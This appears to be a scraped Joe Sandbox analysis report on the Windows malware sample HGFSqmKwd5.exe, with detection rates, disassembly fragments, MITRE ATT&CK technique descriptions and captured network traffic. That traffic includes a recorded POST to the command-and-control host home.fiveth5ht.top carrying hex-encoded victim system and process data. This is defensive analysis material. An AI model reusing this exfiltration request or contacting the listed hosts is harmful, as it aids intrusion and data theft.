Instruction ID: 5a4f6e60ccf73c64f56528181000098a321a6326b94e27719a462b709c46a298
Opcode Fuzzy Hash: ea0f4f2f02c77cff6850d85ad844458c6e7b1f7dbe77ef8bfb68b44ec121d332
Instruction Fuzzy Hash: 3861937060C7458BD71CAF69C48022EFBD2AFC5314F58CA2DE8968B391E774D9458F4A

Source: Joe Sandbox View	IP Address: 34.226.108.155 34.226.108.155
Source: Joe Sandbox View	IP Address: 81.29.149.125 81.29.149.125

Source: HGFSqmKwd5.exe	Virustotal: Detection: 57%			Perma Link
Source: HGFSqmKwd5.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: mov dword ptr [ebp+04h], 424D53FFh	0_2_00E6A5B0
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: mov dword ptr [ebx+04h], 424D53FFh	0_2_00E6A7F0
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: mov dword ptr [edi+04h], 424D53FFh	0_2_00E6A7F0
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: mov dword ptr [esi+04h], 424D53FFh	0_2_00E6A7F0
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: mov dword ptr [edi+04h], 424D53FFh	0_2_00E6A7F0
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: mov dword ptr [esi+04h], 424D53FFh	0_2_00E6A7F0
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: mov dword ptr [ebx+04h], 424D53FFh	0_2_00E6A7F0

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: /Content-Type: application/jsonContent-Length: 498423Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 31 37 34 37 34 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global traffic	HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: /Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.fiveth5ht.top

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
Tactics:	Lateral Movement
Data Sources:	Application Log: Application Log Content, Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HGFSqmKwd5.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
HGFSqmKwd5.exe

Function 00E0255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282
fileCOMMON

Function 00E029FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321
registryfileCOMMON

Function 00E105B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377
networkCOMMON

Function 00ECB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
COMMON

Function 00EC9740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743
registryCOMMON

Function 00E38B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269
networkCOMMON

Function 00E02F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144
registryCOMMON

Function 00E076A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73
networkCOMMON

Function 00E39290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
networkCOMMON

Function 00E07770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73
networkCOMMON

Function 00E075E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
networkCOMMON

Function 00E3A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80
COMMON

Function 00E1D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46
networkCOMMON

Function 00ECAA30 Relevance: 4.9, APIs: 3, Instructions: 377
networkCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre